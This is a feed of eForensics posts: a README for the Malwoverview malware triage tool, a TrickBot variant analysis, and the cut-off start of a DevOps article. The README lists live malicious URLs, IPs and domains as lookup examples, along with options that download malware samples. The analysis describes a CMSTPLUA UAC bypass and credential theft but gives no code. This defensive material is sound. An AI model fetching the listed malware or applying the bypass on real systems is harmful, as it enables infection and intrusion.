Malwoverview 3.0.0 is available! | By Alexandre Borges

May 6, 2020, 4:20 am

≫ Next: TrickBot Analysis and Forensics | By Siddharth Sharma

≪ Previous: Close the Security Gaps of a Remote Workforce | From itopia.com

Malwoverview 3.0.0 is available!

command examples available on GitHub

Malwoverview is a first response tool to perform an initial and quick triage in a directory containing malware samples, specific malware sample, suspect URL and domains. Additionally, it allows to download and send samples to main online sandboxes.

3.0.0 version:

* Includes fixes in the URL reporting (-u option) from Virus Total.

* New players have have been included in the URL reporting (-u option) from Virus Total.

* Fixes have been included in payload listing (-K option) from URLhaus.

* Yara information has been include in the hash report (-m option) from Malshare.

* Fixes have been included in the -l option.

* New file types have been included in the -n option: Java, Zip, data, RAR, PDF, Composite (OLE), MS_DOS and UTF-8.

* New -W option, which is used to show URLs related to an user provided tags from URLHaus.

* New -k option, which is used to show payloads related to a tag from URLHaus

* New -I option, which is used to show information related to an IP address from Virus Total.

* The -R option was refactored and now it supports searching for file, IPv4, domain or URL on Polyswarm.

Malwoverview.py

(Gaps in the VT output at image above are because public VT API key, which allows only 4 searches per minute).

  Copyright (C)  2018-2020 Alexandre Borges <alexandreborges at blackstormsecurity dot com>

  This program is free software: you can redistribute it and/or modify
  it under the terms of the GNU General Public License as published by
  the Free Software Foundation, either version 3 of the License, or
  (at your option) any later version.

  This program is distributed in the hope that it will be useful,
  but WITHOUT ANY WARRANTY; without even the implied warranty of
  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  GNU General Public License for more details.

  See GNU Public License on <http://www.gnu.org/licenses/>.

Current Version: 3.0.0

Important note: Malwoverview does NOT submit samples to Virus Total or Hybrid Analysis by default. It submits only hashes, so respecting Non-Disclosure Agreements (NDAs). Nonetheless, if you use the "-V" (uppercase), "-A" (uppercase) or "-P" (uppercase), so Malwoverview SUBMITS your malware sample to Virus Total, Hybrid Analysis and Polyswarm, respectively.

ABOUT

Malwoverview.py is a simple tool to perform an initial and quick triage of malware samples, URLs and hashes. Additionally, Malwoverview is able to show some threat intelligence information.

This tool aims to :

Determine similar executable malware samples (PE/PE+) according to the import table (imphash) and group them by different colors (pay attention to the second column from output). Thus, colors matter!
Show hash information on Virus Total, Hybrid Analysis, Malshare, Polyswarm and URLhaus engines.
Determining whether the malware samples contain overlay and, if you want, extract it.
Check suspect files on Virus Total, Hybrid Analysis and Polyswarm.
Check URLs on Virus Total, Malshare, Polyswarm and URLhaus engines.
Download malware samples from Hybrid Analysis, Malshare and HausURL engines.
Submit malware samples to VirusTotal, Hybrid Analysis and Polyswarm.
List last suspected URLs from URLHaus.
List last payloads from URLHaus.
Search for specific payloads on the Malshare.
Search for similar payloads (PE32/PE32+) on Polyswarm engine.
Classify all files in a directory searching information on Virus Total and Hybrid Analysis.
Make reports about a suspect domain.
Check APK packages directly from Android devices against Hybrid Analysis and Virus Total.
Submit APK packages directly from Android devices to Hybrid Analysis and Virus Total.
Show URLs related to an user provided tag from URLHaus.
Show payloads related to a tag (signature) from URLHaus.
Show information about an IP address from Virus Total.
Show IP address, domain and URL information fron Polyswarm.
List different types of payloads from Malshare along their Yara hits.

REQUERIMENTS

This tool has been tested on Ubuntu, Kali Linux 2020, Windows 8.1 and 10. Malwoverview can be installed by executing the following command:

    $ pip3.8 install malwoverview                     (Linux)
    C:\> python.exe -m pip install malwoverviewwin    (Windows)

In Linux systems, add the /usr/local/bin to the PATH environment variable.

Additionally, insert your APIs in the malwconf.py file in /usr/local/lib/python3.x/dist-packages/malwoverview/conf directory (Linux) or C:\Python37\Lib\site-packages\malwoverviewwin\conf directory (Windows).

In Windows systems, when the package is installed using pip, it is not necessary to specify "-w 1" anymore.

To check the installation, execute:

   (Linux) malwoverview --help
   (Windows) malwoverview.py --help

If you are installing the Malwoverview into a Python virtual environment, so you should follow the step-by-step procedure below:

   $ mkdir mytest
   $ python3.8 -m venv mytest/
   $ source mytest/bin/activate
   $ cd mytest/
   $ pip3.8 -q install malwoverview
   $ cd bin
   $ pip3.8 show malwoverview
   $ ls ../lib/python3.8/site-packages/malwoverview/conf/
   $ cp /malwoverview/configmalw.py ../lib/python3.8/site-packages/malwoverview/conf/
   $ malwoverview

Further information is available on:

   (Linux) https://pypi.org/project/malwoverview/
   (Windows) https://pypi.org/project/malwoverviewwin/
   (Github) https://github.com/alexandreborges/malwoverview

If you want to perform the manual steps, so few steps will be necessary:

Kali Linux

Python version 3.8 or later (Only Python 3.x !!! It does NOT work using Python 2.7)
```
$ apt-get install python3.8  (for example)
```
Python-magic.To install python-magic package you can execute the following command:
```
$ pip3.8 install python-magic
```
Or compiling it from the github repository:
```
$ git clone https://github.com/ahupp/python-magic
$ cd python-magic/
$ python3.8 setup.py build
$ python3.8 setup.py install
```
As there are serious problems about existing two versions of python-magic package, my recommendation is to install it from github (second procedure above) and copy the magic.py file to the SAME directory of malwoverview tool.

Install several Python packages:

$ pip3.8 install -r requirements.txt

OR

$ pip3.8 install pefile
$ pip3.8 install colorama
$ pip3.8 install simplejson
$ pip3.8 install python-magic
$ pip3.8 install requests
$ pip3.8 install validators
$ pip3.8 install geocoder
$ pip3.8 install polyswarm-api

To check an Android mobile you need to install the "adb" program by executing the following command:

# apt get install adb

PS: before trying Android's options, check:

* If the adb program is listed in the PATH environment variable.
* If the system has authorized access to the device by using "adb devices -l"

Windows

Install the Python version 3.8.x or later from https://www.python.org/downloads/windows/

Python-magic.To install python-magic package you can execute the following command:

C:\> python.exe -m pip install python-magic

Or compiling it from the github repository:

C:\> git clone https://github.com/ahupp/python-magic
C:\> cd python-magic/
C:\> python.exe setup.py build
C:\> python.exe setup.py install

Install several Python packages:

C:\> python.exe -m pip install -r requirements.txt

OR: 

C:\> python.exe -m pip install pefile
C:\> python.exe -m pip install colorama
C:\> python.exe -m pip install simplejson
C:\> python.exe -m pip install python-magic
C:\> python.exe -m pip install requests
C:\> python.exe -m pip install validators
C:\> python.exe -m pip install geocoder
C:\> python.exe -m pip install polyswarm-api
C:\> python.exe -m pip install python-magic-bin==0.4.14

(IMPORTANT) Remove the magic.py file from malwoverview directory.
(VERY IMPORTANT) Install the python-magic DLLs by executing the following command:
```
C:\> python.exe -m pip install python-magic-bin==0.4.14 
```

To check an Android mobile you need to install the "adb" program by:

* Downloading and installing the Android Studio from: https://developer.android.com/studio#downloads (Recommended)
* Downloading it from https://dl.google.com/android/repository/platform-tools-latest-windows.zip

PS: before trying Android's options, check:

* If the adb program is listed in the PATH environment variable.
* If the system has authorized access to the device by using "adb devices -l"

Virus Total, Hybrid-Analysis, Malshare, URLHaus and Polyswarm engines

You must edit the configmalw.py file (Linux: /usr/local/lib/python3.x/dist-packages/malwoverview/conf directory ; Windows: C:<Python installation directory>\Lib\malwoverview directory) and insert your APIs to enable all engines. Pay attention: the APIs are not registered within malwoverview.py anymore!

  VT: 

        VTAPI = '<----ENTER YOUR API HERE---->'

  Hybrid-Analysis: 

        HAAPI = '<----ENTER YOUR API HERE---->'    

  Malshare: 

        MALSHAREAPI = '<----ENTER YOUR API HERE---->'

  HAUSUrl:

        HAUSSUBMITAPI = '<----ENTER YOUR API HERE---->'

  Polyswarm.IO:

        POLYAPI = '<----ENTER YOUR API HERE---->'

USAGE

To use the malwoverview, execute the command as shown below:

  root@ubuntu19:~/malwoverview# python3.8 malwoverview.py  | more

  usage: python malwoverview.py -d <directory> -f <fullpath> -i <0|1> -b <0|1> -v <0|1> -a <0|1> 
  -p <0|1> -s <0|1> -x <0|1> -w <|1> -u <url> -H <hash file> -V <filename> -D <0|1> -e<0|1|2|3|4>
  -A <filename> -g <job_id> -r <domain> -t <0|1> -Q <0|1> -l <0|1> -n <1-12> -m <hash> -M <0|1> 
  -U <url> -S <url> -z <tags> -B <0|1> -K <0|1> -j <hash> -J <hash> -P <filename> -N <url> 
  -R <PE file, IP address, domain or URL> -G <0|1|2|3|4> -y <0|1> -Y <file name> -Z <0|1> 
  -X <0|1> -Y <file name> -T <file name> -W <tag> -k <signature> -I <ip address>

Malwoverview is a malware triage tool written by Alexandre Borges.

  optional arguments:

  -h, --help        show this help message and exit
  -d DIRECTORY, --directory DIRECTORY
                    specify directory containing malware samples.
  -f FILENAME, --filename FILENAME
                    Specifies a full path to a file. Shows general information about the file (any filetype)
  -b BACKGROUND, --background BACKGROUND
                    (optional) Adapts the output colors to a white terminal. The default is black terminal
  -i IAT_EAT, --iat_eat IAT_EAT
                    (optional) Shows imports and exports (it is used with -f option).
  -x OVERLAY, --overlay OVERLAY
                    (optional) Extracts overlay (it is used with -f option).
  -s SHOW_VT_REPORT, --vtreport SHOW_VT_REPORT
                    Shows antivirus reports from the main players. This option is used with the -f option (any filetype).
  -v VIRUSTOTAL, --virustotal VIRUSTOTAL
                    Queries the Virus Total database for positives and totals.Thus, you need to edit the configmalw.py 
                    and insert your VT API.
  -a HYBRID_ANALYSIS, --hybrid HYBRID_ANALYSIS
                    Queries the Hybrid Analysis database for general report. Use the -e option to specify which 
                    environment are looking for the associate report because the sample can have been submitted to a 
                    different environment that you are looking for. Thus, you need to edit the configmalw.py i
                    and insert your HA API and secret.
  -p USE_VT_PUB_KEY, --vtpub USE_VT_PUB_KEY
                    (optional) You should use this option if you have a public Virus Total API. It forces a one 
                    minute wait every 4 malware samples, but allows obtaining a complete evaluation of the 
                    malware repository.
  -w RUN_ON_WINDOWS, --windows RUN_ON_WINDOWS
                    This option is used when the OS is Microsoft Windows.
  -u URL_VT, --vturl URL_VT
                    SUBMITS a URL for the Virus Total scanning.
  -I IP_VT, --ipaddrvt IP_VT
                    This options checks an IP address on Virus Total.
  -r URL_DOMAIN, --urldomain URL_DOMAIN
                    GETS a domain's report from Virus Total.
  -H FILE_HASH, --hash FILE_HASH
                    Specifies the hash to be checked on Virus Total and Hybrid Analysis. For the Hybrid Analysis
                    report you must use it together -e option.
  -V FILENAME_VT, --vtsubmit FILENAME_VT
                    SUBMITS a FILE(up to 32MB) to Virus Total scanning and read the report. Attention: use forward 
                    slash to specify the target file even on Windows systems. Furthermore, the minimum waiting time
                    is set up in 90 seconds because the Virus Total queue. If an error occurs, so wait few minutes 
                    and try to access the report by using -f option.
  -A SUBMIT_HA, --submitha SUBMIT_HA
                    SUBMITS a FILE(up to 32MB) to be scanned by Hybrid Analysis engine. Use the -e option to specify
                    the best environment to run the suspicious file.
  -g HA_STATUS, --hastatus HA_STATUS
                    Checks the report's status of submitted samples to Hybrid Analysis engine by providing the 
                    job ID. Possible returned status values are: IN_QUEUE, SUCCESS, ERROR, IN_PROGRESS and 
                    PARTIAL_SUCCESS.
  -D DOWNLOAD, --download DOWNLOAD
                    Downloads the sample from Hybrid Analysis. Option -H must be specified.
  -e HA_ENVIRONMENT, --haenv HA_ENVIRONMENT
                    This option specifies the used environment to be used to test the samlple on Hybrid Analysis:
                    <0> Windows 7 32-bits; <1> Windows 7 32-bits (with HWP Support); <2> Windows 7 64-bits; 
                    <3> Android; <4> Linux 64-bits environment. This option is used together either -H option 
                    or the -A option or -a option.
  -t MULTITHREAD, --thread MULTITHREAD
                    (optional) This option is used to force multithreads on Linux whether: the -d option is specifed
                    AND you have a PAID Virus Total API or you are NOT checking the VT while using the -d option.
                    PS1: using this option causes the Imphashes not to be grouped anymore; PS2: it also works on 
                    Windows, but there is not gain in performance.
  -Q QUICK_CHECK, --quick QUICK_CHECK
                    This option should be used with -d option in two scenarios: 1) either including the -v option
                    (Virus Total -- you'll see a complete VT response whether you have the private API) for a 
                    multithread search and reduced output; 2) or including the -a option (Hybrid Analysis) for a
                    multithread search and complete and amazing output. If you are using the -a option, so -e option
                    can also be used to adjust the output to your sample types. PS1: certainly, if you have a
                    directory holding many malware samples, so you will want to test this option with -a option; i
                    PS2: it also works on Windows, but there is not gain in performance.
  -l MALSHARE_HASHES, --malsharelist MALSHARE_HASHES
                    Show hashes from last 24 hours from Malshare. You need to insert your Malshare API into the
                    configmalw.py file.
  -m MALSHARE_HASH_SEARCH, --malsharehash MALSHARE_HASH_SEARCH
                    Searches for the provided hash on the Malshare repository. You need to insert your Malshare API
                    into the configmalw.py file. PS: sometimes the Malshare website is unavailable, so should check
                    the website availability if you get some error message.
  -n FILE_TYPE, --filetype FILE_TYPE
                    Specifies the file type to be listed by -l option. Therefore, it must be used together i
                    -l option. Possible values: 1: PE32 (default) ; 2: Dalvik ; 3: ELF ; 4: HTML ; 5: ASCII ; 
                    6: PHP ; 7: Java ; 8: RAR ; 9: Zip ; 10: UTF-8 ; 11: MS-DOS ; 12: data ; 13: PDF ; i
                    14: Composite(OLE).
  -M MALSHARE_DOWNLOAD, --malsharedownload MALSHARE_DOWNLOAD
                    Downloads the sample from Malshare. This option must be specified with -m option.
  -B URL_HAUS_BATCH, --haus_batch URL_HAUS_BATCH
                    Retrieves a list of recent URLs (last 3 days, limited to 1000 entries) from URLHaus website.
  -K HAUS_PAYLOADS, --haus_payloadbatch HAUS_PAYLOADS
                    Retrieves a list of downloadable links to recent PAYLOADS (last 3 days, limited to 1000 
                    entries) from URLHaus website. Take care: each link take you to download a passworless zip file
                    containing a malware, so your AV can generate alerts!
  -U URL_HAUS_QUERY, --haus_query URL_HAUS_QUERY
                    Queries a URL on the URLHaus website.
  -j HAUS_HASH, --haus_hash HAUS_HASH
                    Queries a payload's hash (md5 or sha256) on the URLHaus website.
  -S URL_HAUS_SUB, --haus_submission URL_HAUS_SUB
                    Submits a URL used to distribute malware (executable, script, document) to the URLHaus website.
                    Pay attention: Any other submission will be ignored/deleted from URLhaus. You have to register
                    your URLHaus API into the configmalw.py file.
  -z [HAUSTAG [HAUSTAG ...]], --haustag [HAUSTAG [HAUSTAG ...]]
                    Associates tags (separated by spaces) to the specified URL. Please, only upper case, lower 
                    case, '-' and '.' are allowed. This parameter is optional, which could be used with the 
                    -S option.
  -W [HAUSTAGSEARCH [HAUSTAGSEARCH ...]], --haustagsearch [HAUSTAGSEARCH [HAUSTAGSEARCH ...]]
                    This option is for searching malicious URLs by tag on URLhaus. Tags are case-senstive and only
                    upper case, lower case, '-' and '.' are allowed.
  -k [HAUSSIGSEARCH [HAUSSIGSEARCH ...]], --haussigsearch [HAUSSIGSEARCH [HAUSSIGSEARCH ...]]
                    This option is for searching malicious payload by tag on URLhaus. Tags are case-sensitive and
                    only upper case, lower case, '-' and '.' are allowed.
  -J HAUS_DOWNLOAD, --haus_download HAUS_DOWNLOAD
                    Downloads a sample (if it is available) from the URLHaus repository. It is necessary to provide
                    the SHA256 hash.
  -P POLYSWARMFILE, --polyswarm_scan POLYSWARMFILE
                    (Only for Linux) Performs a file scan using the Polyswarm engine.
  -N POLYSWARMURL, --polyswarm_url POLYSWARMURL
                    (Only for Linux) Performs a URL scan using the Polyswarm engine.
  -O POLYSWARMHASH, --polyswarm_hash POLYSWARMHASH
                    (Only for Linux) Performs a hash scan using the Polyswarm engine.
  -R POLYSWARMMETA, --polyswarm_meta POLYSWARMMETA
                    (Only for Linux) Performs a complementary search for similar PE executables through 
                    meta-information or IP addresses using the Polyswarm engine. This parameters depends on
                    -G parameters, so check it, please.
  -G METATYPE, --metatype METATYPE
                    (Only for Linux) This parameter specifies whether the -R option will gather information about
                    the PE executable or IP address using the Polyswarm engine. Thus, 0: PE Executable ;
                    1: IP Address ; 2: Domains ; 3. URL.
  -y ANDROID_HA, --androidha ANDROID_HA
                    Check all third-party APK packages from the USB-connected Android device against Hybrid Analysis
                    using multithreads. The Android device does not need be rooted and you need have adb in your 
                    PATH environment variable.
  -Y ANDROID_SEND_HA, --androidsendha ANDROID_SEND_HA
                    Send an third-party APK packages from your USB-connected Android device to Hybrid Analysis. The
                    Android device does not need be rooted and you need have adb in your PATH environment variable.
  -T ANDROID_SEND_VT, --androidsendvt ANDROID_SEND_VT
                    Send an third-party APK packages from your USB-connected Android device to Virus Total. The 
                    Android device does not need be rooted and you need have adb in your PATH environment variable.
  -Z ANDROID_VT, --androidvt ANDROID_VT
                    Check all third-party APK packages from the USB-connected Android device against VirusTotal 
                    using Public API (slower because of 60 seconds delay for each 4 hashes). The Android device 
                    does not need be rooted and you need have adb in your PATH environment variable.
  -X ANDROID_VT, --androidvtt ANDROID_VT
                    Check all third-party APK packages from the USB-connected Android device against VirusTotal 
                    using multithreads (only for Private Virus API). The Android device does not need be rooted and
                    you need have adb in your PATH environment variable.


    If you use Virus Total, Hybrid Analysis, Malshare, URLHaus or Polyswarm options, so it is necessary
    to edit the configmalw.py file and insert your APIs. 

    Remember that public VT API only allows 4 searches per second (as shown at the image above). Therefore,
    if you are willing to wait some minutes, so you can use the -p option, which forces a one minute wait 
    every 4 malware samples, but allows obtaining a complete evaluation of the repository.


    * ATTENTION 1: if the directory contains many malware samples while using -d option, so malwoverview.py
                   could take some time. Nonetheless, you can use the new -t option (multithreading) to
                   speed-up things. :)
     
    ** ATTENTION 2: All engines enforces quota of submission and/or verification per day and/or month. 
                    Take care!
    
    *** ATTENTION 3: Some options searching on Hybrid Analysis strongly depend of the "-e" option, which 
                     specifies the environment. Therefore, to check an Android sample (for example) it is 
                     necessary to use the right environment (-e 3 for Android).
    
    **** ATTENTION 4: When you execute Malwoverview on Windows systems, you MUST to specify the "-w 1" option.

Examples:

  python3.8 malwoverview.py -d /root/malware/misc/
  python3.8 malwoverview.py -d /root/malware/misc/ -t 1
  python3.8 malwoverview.py -d /root/malware/misc/ -t 1 -v 1
  python3.8 malwoverview.py -d /root/malware/misc/ -v 1 -p 1
  python3.8 malwoverview.py -d /root/malware/misc/ -Q 1 -v 1
  python3.8 malwoverview.py -d /root/malware/misc/ -Q 1 -a 1
  python3.8 malwoverview.py -d /root/malware/android/ -Q 1 -a 1 -e 3
  python3.8 malwoverview.py -d /root/malware/linux/ -Q 1 -a 1 -e 4
  python3.8 malwoverview.py -f /root/malware/misc/sample1 -v 1 -s 1
  python3.8 malwoverview.py -f /root/malware/misc/sample1 -i 1
  python3.8 malwoverview.py -f /root/malware/misc/sample1 -v 1 -s 1 -x 1
  python3.8 malwoverview.py -u <url>
  python3.8 malwoverview.py -r <domain>
  python3.8 malwoverview.py -H <hash> -e 2
  python3.8 malwoverview.py -H <hash> -e 1
  python3.8 malwoverview.py -V /root/malware/android/sample.apk
  python3.8 malwoverview.py -A /root/malware/windows/sample1
  python3.8 malwoverview.py -A /root/malware/android/sample.apk -e 3
  python3.8 malwoverview.py -g <job_id>
  python3.8 malwoverview.py -l 1
  python3.8 malwoverview.py -l 1 -n 2
  python3.8 malwoverview.py -l 1 -n 3
  python3.8 malwoverview.py -m <hash>
  python3.8 malwoverview.py -m <hash> -M 1
  python3.8 malwoverview.py -B 1
  python3.8 malwoverview.py -U <URL>
  python3.8 malwoverview.py -K 1
  python3.8 malwoverview.py -j <hash>
  python3.8 malwoverview.py -J <hash>
  python3.8 malwoverview.py -S <URL> -z SpelevoEK exe psixbot
  python3.8 malwoverview.py -O <hash>
  python3.8 malwoverview.py -N <URL>
  python3.8 malwoverview.py -P sample1
  python3.8 malwoverview.py -R /root/malware/windows/sample1
  python3.8 malwoverview.py -y 1
  python3.8 malwoverview.py -Y skype
  python3.8 malwoverview.py -Z 1
  python3.8 malwoverview.py -X 1
  python3.8 malwoverview.py -T twitter 
  python3.8 malwoverview.py -u https://toulousa.com/omg/159EYJSFYHMS.exe
  python3.8 malwoverview.py -k Trickbot
  python3.8 malwoverview.py -m e47a415662b5fad1f3049764456ba2ac33a1bde6fd3181ec2b658d382ad17d41
  python3.8 malwoverview.py -W mirai
  python3.8 malwoverview.py -I 149.56.79.215
  python3.8 malwoverview.py -R 164.132.92.180 -G 1
  python3.8 malwoverview.py -R sndoffo79.ddns.net -G 2
  python3.8 malwoverview.py -R http://t.turconfiok.pro -G 3

HISTORY

Version 3.0.0:

  This version:
  
        * Introduces the following options:
        * Includes fixes in the URL reporting (-u option) from Virus Total.  
        * New players have have been included in the URL reporting (-u option) from Virus Total.
        * Fixes have been included in payload listing (-K option) from URLhaus.
        * Yara information has been include in the hash report (-m option) from Malshare.
        * Fixes have been included in the -l option. 
        * New file types have been included in the -n option: Java, Zip, data, RAR, PDF, Composite (OLE), MS_DOS
          and UTF-8.
        * New -W option, which is used to show URLs related to an user provided tags from URLHaus.
        * New -k option, which is used to show payloads related to a tag from URLHaus
        * New -I option, which is used to show information related to an IP address from Virus Total.
        * The -R option was refactored and now it supports searching for file, IPv4, domain or URL on Polyswarm.

Version 2.5.0:

  This version:
  
        * Introduces the following options:
              * -y to check all third-party APKs from an Android device against 
                   the Hybrid Analysis. 
              * -Y to send a third-party APKs from an Android device to the Hybrid
                   Analysis. 
              * -Z to check all third-party APKs from an Android device against 
                   the Virus Total. 
              * -X to check all third-party APKs from an Android device against the
                   Virus Total (it is necessary private API). 
              * -T to send a third-party APK from an Android device to Virus Total. 
        * Fixes several issues related to color in command outputs.  
        * Adds the filename identification in the report while sending a sample to Virus Total.

Version 2.1.9.1:

  This version:
  
        * Fixes several issues about colors in outputs. 
        * Removes the -L option from Malshare (unfortunately, Malshare doesn't provide an 
          URL list anymore). 
        * Removes the -c option.
        * Introduces some verification lines in the URLHaus command.

Version 2.1:

  This version:
  
        * Fixes formatting issues related to Hybrid Analysis output (-Q 1 -a 1). 
        * Fixes color issues. 
        * Fixes small issues related to Polyswarm.

Version 2.0.8.1:

  This version:
  
        * Introduces installation using: pip3.8 install malwoverview (Linux) or 
          python -m pip install malwoverviewwin (Windows). 
        * Fixes small problems related to Polyswarm usage. 
        * Changes the help to verify whether the APIs were inserted into configmalw.py file.

Version 2.0.1:

  This version:
  
        * Fixes a problem related to searching by hash on Malshare (-m option). 
        * Fixes a problem related to searching by hash on Polyswarm (-O option).

Version 2.0.0:

  This version:
  
        * Introduces a completely ported version of Malwoverview to Python 3.x (it does not work in 
          Python 2.7.x anymore!)
        * Fixes several bugs related to IAT/EAT listing. 
        * Fixes several bugs related to colors. 
        * Introduces multi-threading to some options. 
        * Introduces several options related to Malshare. 
        * Introduces several options related to URLHaus.
        * Introduces several options related to Polyswarm engine. 
        * Changes the place of the API key configuration. Now you should edit the configmalw.py file. 
        * Changes the help libraries and functions, so making the Malwoverview's help more complete. 
        * Introduces geolocation feature by using the package named Geocoder written by Dennis Carrierre.
        * Fixes problems related to Hybrid Analysis engine. 
        * Fixes several mistaked related to a mix between spaces and Tab.
        * Extends the -d option to include Hybrid Analysis.

Version 1.7.5:

  This version: 
  
        * It has been fixed a problem related to sample submission to Hybrid Analysis on Windows operating 
          system. Additionally, file name handling has been also fixed.

Version 1.7.3:

  This version: 
  
        * Malwoverview has been adapted to API version 2.6.0 of Hybrid Analysis.
        * -A option has been fixed according to new version (2.6.0) of Hybrid Analysis.
        * -a option has been modified to work together with  -e option.
        * help information has been modified.

Version 1.7.2:

  This version: 
  
        * A small fix related to -g option has been included.

Version 1.7.1:

  This version: 
  
        * Relevant fix of a problem related to options -A and -H options.
        * Includes a new Hybrid Analysis environment to the -e option (Windows 7 32-bits with HWP support).
        * Updates the Malwoverview to support Hybrid Analysis API version 2.5.0.

Version 1.7.0:

  This version: 
  
        * Includes -A option for submitting a sample to Hybrid Analysis.
        * Includes -g option for checking the status a submission of a sample to Hybrid Analysis.
        * Includes -e option for specifying the testing environment on the Hybrid Analysis.
        * Includes -r option for getting a complete domain report from Virus Total.
        * Modifies the -H options for working together the -e option.
        * Modifies several functions of the tool to prepare it for version 1.8.0

Version 1.6.3:

  This version: 
  
        * Includes creation of new functions aiming 1.7.0 version.
        * Includes new exception handling blocks.

Version 1.6.2:

  This version: 
  
        * Includes small fixes.
        * For the Hybrid Analysis API version 2.40 is not longer necessary to include the API Secret.

Version 1.6.1:

  This version: 
  
        * Includes small format fixes.

Version 1.6.0:

  This version: 
  
        * It is using the Hybrid Analysis API version 2.4.0.
        * Includes certificate information in the Hybrid Analysis report. 
        * Includes MITRE information in the Hybrid Analysis report. 
        * Includes an option to download samples from Hybrid Analysis.

Version 1.5.1:

  This version: 
  
        * Small change to fix format issue in -d option.

Version 1.5.0:

  This version: 
  
        * Includes the -u option to check URLs against Virus Total and associated engines. 
        * Includes the -H option to find existing reports on Virus Total and Hybrid Analysis through the hash.
        * Includes the -V option to submit a file to Virus Total. Additionally, the report is shown afer few 
          minutes.
        * Includes two small fixes.

Version 1.4.5.2:

  This version:

        * Includes two small fixes.

Version 1.4.5.1:

  This version:

        * Includes one small fix.

Version 1.4.5:

  This version:
  
        * Adds the -w option to use malwoverview in Windows systems.
        * Improves and fixes colors when using -b option with black window.

Version 1.4:

  This version:

        * Adds the -a option for getting the Hybrid Analysis summary report.
        * Adds the -i option for listing imported and exported functions. Therefore, imported/exported
          function report was decoupled for a separated option.

Version 1.3:

  This version:

        * Adds the -p option for public Virus Total API.

Version 1.2:

  This version includes:

        * evaluates a single file (any filetype)
        * shows PE sessions.
        * shows imported functions.
        * shows exported function.
        * extracts overlay.
        * shows AV report from the main players. (any filetype)

Version 1.1:

  This version:

        * Adds the VT checking feature.

Version 1.0:

Malwoverview is a tool to perform a first triage of malware samples in a directory and group them according to their import functions (imphash) using colors. This version:

* Shows the imphash information classified by color.
* Checks whether malware samples are packed.
* Checks whether malware samples have overlay.
* Shows the entropy of the malware samples.

Originally published: https://github.com/alexandreborges/malwoverview

The post Malwoverview 3.0.0 is available! | By Alexandre Borges appeared first on eForensics.

↧

TrickBot Analysis and Forensics | By Siddharth Sharma

May 7, 2020, 2:49 am

≫ Next: How to Handle DevOps Failure? | By Rebecca James

≪ Previous: Malwoverview 3.0.0 is available! | By Alexandre Borges

TrickBot Analysis and Forensics

This blog is about the analysis of a recent trickbot variant uploaded on malware traffic. The sample was having a trickbot server which was reported recently, also having a unique feature that is UAC bypass using CMSTLUA COM interface. The sample had EMOTET malware signatures as well, which I found during its injection activity.In this post we will do:

1.Dynamic Analysis

2.Static Analysis

3.Memory Forensics

Dynamic Analysis

The sample wasn’t packed and neither it had AntiVM or anti-debug functionality. So, simply I ran that to observe its activity at process level like injection or spawning new process, what I found was it first it injects itself in explorer.exe and then it creates another process by the same name with elevated privileges. Following are the screenshots of observation:

Using dllhost.exe to execute via COM and Privilege escalation:

Spawns the new process with elevated privileges.

Downloads pwgrab32 tool (Appdata folder) which is generally used to grab the sensitive credentials stored in the system:

On checking properties and strings of the process I found:

That’s clear it targets stored browser credentials.

Also, when I looked for network connections, I found one IP address which belonged to a trickbot server:

Below is the same IP being reported in mid April 2020.

Static Analysis

Trickbot as we know has been there since long, and this modular banking trojan, with time, comes with new features and new techniques are being used by adversaries in an updated variant, in this case while doing advanced static and dynamic analysis, I found following features:

Starting with looking the sample in IDA, found some resource related WinAPIs:

Checked to see what was there in the resource section of this malware:

It seemed to be encrypted so switched to IDA again to see if there is any loop or decryption mechanism being used:

Found nothing and no VirtualAlloc but one thing was here to note that GetCurrentProcess WinAPI was used with memcpy where I guess it copies the code at a certain allocated buffer, so decided to look it in more deep using x64dbg.

Started with putting breakpoints on resource APIs:

As we can see above, its clear that the malware injects the code which is there in its rsrc section.

Going further, to view its activity at deeper level, decided to put a breakpoint at GetCurrentProcess, a point to note here is according to its MSDN, it has no parameters, so looking at its return value that is by following EAX in dump would give an idea what it tries to do:

As we saw in dynamic analysis, it first looks for explorer.exe as shown above.

Finally, we got some clue that it uses Microsoft Cryptographic Service Provider to decrypt the contents of its resource in the memory, moreover when it was checked in detail, i found RSA. For this point I decided to look this activity via memory forensics (later in the post) that what the code was responsible for.

While analysis, after the decryption step, when the break point was hit I observed that it used certain kind of interface as shown below:

This is actually UAC bypass using CMSTPLUA COM interface, a code snippet shows this below:

Above pop up shows that the malware is trying to run again as a new process, we saw in dynamic analysis I guess with elevated privileges.

Above pic shows it creates a new process, on observation I found that the process which was created initially, vanishes.

Memory Forensics

Basically, I took two dumps, one after 30 seconds and another after a minute or so, following were the observations and differences:

For dump1, when I checked for malicious processes, as expected found two processes of this malware (highlighted above), first one having PPID 276(explorer.exe).

For dump2, I found one malicious process that is as said above, initial process vanishes.

Then I used malfind to see if there is any code injection, found some code being injected into the running malicious process of dump1.

Moreover, in the dump1, there was a code injection in explorer.exe process as well.

After this, on checking the network activities using netscan:

For dump1, there was no network connection that means no connection initially by the malware.

But for dump2, as can be seen above, found the connection with the IP address belonging to Trickbot server.

Following shows the comparison of the privileges of both the dumps:

Less privileges as we can see above,

But for new process that is dump2, we have a lot of privileges enabled:

Moreover, when I dumped the injected code running in the new elevated process, then uploaded that on Virus total and interestingly found EMOTET signatures as shown:

This was the analysis of this new variant of trickbot, supposedly, the encrypted code in the resource section of the malware was responsible for privilege escalation purpose which we saw was done using dllhost via COM interface then after that the malware connects to the trickbot server and starts its malicious activity using pwgrab tool after grabbing it from the server.

Behaviour graph:

Behaviour activities:

References:

https://any.run/report/871bb64c4f7b8933d10109e4d6975c401184b6203a75ed93c081577f2cd93bf8/aca8ee74-71a6-4e05-81e0-945eec08f7af

https://blog.f-secure.com/what-is-trickbot/

For more details of a similar variant used earlier:

https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html

About Siddharth:

Interested in cybersecurity, his blog: https://threatblogs.wordpress.com/
Student currently pursuing bachelors of technology (Computer Science)
Interested in malware analysis,reversing and forensics.
Did internship at Computer Emergency Response Team, India (CERT-In)

The post TrickBot Analysis and Forensics | By Siddharth Sharma appeared first on eForensics.

↧

How to Handle DevOps Failure? | By Rebecca James

May 13, 2020, 12:26 am

≫ Next: How Can Enterprises Tackle Advanced Cyberattacks? | By Rebecca James

≪ Previous: TrickBot Analysis and Forensics | By Siddharth Sharma

| collaborative article |

How to Handle DevOps Failure?

Ever since the concept of DevOps was first introduced in 2008, organizations all over the world have now started to slowly but surely realize the potential that it has to offer, particularly in streamlining the development process and saving costs in the cloud.

